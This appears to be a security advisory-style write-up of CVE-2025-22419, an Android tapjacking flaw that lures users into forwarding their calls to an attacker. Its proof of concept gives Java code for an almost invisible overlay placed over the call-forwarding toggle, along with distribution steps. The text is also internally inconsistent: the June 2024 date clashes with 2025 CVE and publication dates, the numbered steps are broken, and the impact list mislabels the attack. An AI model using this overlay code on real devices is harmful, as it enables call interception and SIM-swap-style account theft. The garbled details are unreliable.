CVE-2025-22419 - Tapjacking Attack to Trick Android Users into Malicious Call Forwarding

Date: June 2024
Author: Security Analyst XYZ
Severity: High
CVSS: 7.2 (High)
References:
- CVE-2025-22419 at MITRE
- Google Android Security Bulletins
- Android Tapjacking Technical Overview

Overview

CVE-2025-22419 is a newly discovered vulnerability affecting multiple Android builds and custom ROMs, related to the device’s phone call forwarding settings. The core problem is that attackers can overlay a seemingly innocent UI (User Interface) over a legitimate system settings screen. This is technically called a tapjacking (or clickjacking) attack.

Through clever apps or malicious web overlays, a user can be misled into tapping on sensitive areas, such as "Enable Call Forwarding" switches, which actually forwards their incoming calls to attacker-controlled numbers. This not only poses a privacy concern, but can be weaponized for SIM Swap, phishing, or communication interception attacks.

Technical Details

The tapjacking attack leverages Android’s ability to stack UIs on top of each other using elements such as Toast, SYSTEM_ALERT_WINDOW, or overlay permission windows. By displaying a transparent or disguised overlay atop the call forwarding settings, the attacker manipulates the user into unintentionally enabling dangerous features.

Victim installs a malicious app requesting overlay permissions.

2. Attacker triggers the overlay at the exact position of phone’s call forwarding setting’s enable toggle.

User thinks they’re interacting with innocuous buttons ("Win a Prize!" dialog, for example).

4. User’s tap is registered on the underlying Settings activity, flipping the call forwarding toggle and entering attacker’s number.

User interaction is required for exploitation. Victims must launch the provided app and follow simple instructions in the popup, believing they are participating in a harmless activity.

Exploit Proof of Concept (PoC)

Below is a condensed example of how an attacker could implement such a tapjacking attack. This is for educational and defensive use only!

// AndroidManifest.xml (request overlay permission)
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>

// MainActivity.java
if (!Settings.canDrawOverlays(this)) {
    Intent intent = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
        Uri.parse("package:" + getPackageName()));
    startActivityForResult(intent, REQUEST_OVERLAY);
} else {
    showOverlay();
}

private void showOverlay() {
    WindowManager windowManager = (WindowManager) getSystemService(WINDOW_SERVICE);

    // Prepare a fake button exactly positioned over the 'Enable Call Forwarding' toggle
    ImageView fakeButton = new ImageView(this);
    fakeButton.setImageResource(R.drawable.fake_button);
    fakeButton.setAlpha(.01f); // almost invisible

    WindowManager.LayoutParams params = new WindowManager.LayoutParams(
        300, 100,      // size matching target
        WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
        WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
        WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
        PixelFormat.TRANSLUCENT);

    params.gravity = Gravity.TOP | Gravity.LEFT;
    params.x = <calculated_x>;
    params.y = <calculated_y>;

    windowManager.addView(fakeButton, params);

    // When user taps, overlay is removed - tap is sent to phone settings underneath
}

Note: Offsets <calculated_x>, <calculated_y> depend on screen size & layout, requiring some trial/error for accurate positioning.

Malicious app is distributed through unofficial app stores or phishing links.

2. Victim is prompted to "tap the button to continue" while call forwarding settings are open (maybe via guided steps or embedded browser).

Impact

- Local privilege escalation: Attackers gain direct management over call settings without explicit user intention.

Communication interception: All calls can be forwarded to attacker.

- Potential account compromise: Used as a step in two-factor authentication attacks, such as SIM swap.

References & Further Reading

- Android Tapjacking Protection
- Lookout Clickjacking Report
- CVE-2025-22419 at NVD (soon)


Conclusion:
CVE-2025-22419 highlights the importance of securing interactions with core device settings, especially with Android’s always-improving UI protections. Tapjacking is a classic but effective abuse technique. Users and developers alike should stay alert for social engineering attacks leveraging overlay permissions – and always keep devices and apps updated.

Timeline

Published on: 09/02/2025 23:15:33 UTC
Last modified on: 09/04/2025 16:39:48 UTC